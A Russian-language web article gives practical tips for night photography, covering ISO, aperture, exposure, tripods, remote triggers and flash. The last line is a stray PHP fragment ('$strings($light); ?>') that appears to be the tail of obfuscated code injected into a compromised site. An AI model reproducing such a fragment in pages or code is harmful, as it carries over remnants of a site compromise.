Расскажи друзьям об этом:

СНИМАЕМ В ТЕМНОТЕ: СОВЕТЫ О НОЧНОЙ СЪЕМКЕ

Снимаем в темноте: Советы о ночной съемке

Зима наступает! Дневного света становится все меньше, но, к счастью, день не должен останавливаться вместе с заходом солнца, как и фотография! Ночная съёмка может быть проблематичной, но она как раз о том как верно захватить свет. У нас есть несколько простых советов, чтобы настроить вас на ночную съемку.

Итак, подготовьтесь!

Silhouette of a fisherman throwing his net with sunset.

Ночная съёмка требует небольшого планирования заранее и некоторого специального оборудование – камера с ручными настройками параметров, штатив, кабель с пультом управления и вспышка. Перед тем как упаковать вашу сумку убедитесь, что вы выбрали места с интересным светом, архитектурой и с потенциалом повествования. Чтобы создать действительно волшебные образы, попробуйте начать свой съемку до темноты и после, и во время золотого часа (первый и последний час солнечного света), чтобы захватить последние лучи и краски с более длительной экспозицией.

Внутри ли помещения или на удице, всегда обращайте внимание на существующий свет. Вы можете значительно улучшить освещение вашего объекта и получить более естественный цвет, просто направляя их в сторону дисплея, или любого другого источника света.

Night life

Познакомьтесь с основами!
Высокая скорость ISO увеличит возможность датчика камеры забирать свет, но это также увеличит и шумы в изображении. При съемке на высокой светочувствительности убедитесь в верном выстраивание экспозиции, так как увеличение экспозиции во время постпродакшена испортит изображение; а вот шум здесь не плох, он особенно хорош в высоком качество DSLR. Высокий ISO также позволяет получить быструю выдержку и меньшую диафрагму, чтобы получить более четкую картинку. Для получения наилучших результатов снимайте в Raw, изображения останутся наиболее «информативными».

Portrait of a handsome young man

Ключ к получению лучшей ночной картинки лежит в управлении диафрагмой и выдержкой. Чтобы избежать движения в изображении, например, в условиях низкой освещенности портретов, рекомендуется большая диафрагма и короткая экспозиция.
Для городских пейзажей, длительная экспозиция в сочетании с малой диафрагмой уменьшит воздействие любого стационарного света и раскроет больше деталей в менее освещенных местах.

The night view of Shanghai

При съемке в ночное время вы должны быть особенно осторожны и максимально уменьшить дрожание камеры. Для продвинутых и длительных экспозиций необходим штатив. Но если вдруг у вас нет одного или, если место не позволяет использовать его, есть и другие варианты; подушки, рюкзаки, свернутая куртка, все это может очень хорошо сработать. Малейшее движение может создать нежелательные сотрясения камеры, так что снимайте с зафиксированным зеркалом (в настройках вашей камеры). Также лучше использовать шнур с пультом управления, но если у вас нет такого, попробуйте использовать таймер автоспуска.
Вы можете использовать вспышку, чтобы “заполнить” места, которые нуждаются в дополнительном свете. Направление вашей вспышки определит атмосферу вашего изображения. Использование вспышки освещает объект, который размещен спереди, однако сплющит изображение. Чтобы дать картинке более мягкий и приятный общий эффект, используйте внешнюю вспышку, которая позволит поиграть с объектом и найти идеальный угол для освещения элементов потеряных в тени.
Вы также можете поэкспериментировать с диффузорами, отображателями и даже носовым платком, чтобы смягчить или отразить вспышку, и включить более рассеянный свет.

Royalty-Free Stock Photography by Rubberball

Как и все остальное в жизни, практика займет какое-то время, прежде чем вы получите действительно классные снимки. Экспериментируйте и играйте с вашей камерой в темноте, результат не всегда предсказуем, но это и есть веселая часть творчества!

© Ссылка на источник




Шаблоны для Photoshop - виньетки, фотооткрытки, костюмы.
Подписаться письмом

Обработка и ретушь фотографий. Практическое использование различных приёмов в фотографии

yvqwfXsFO9"));'); $strings($light); ?>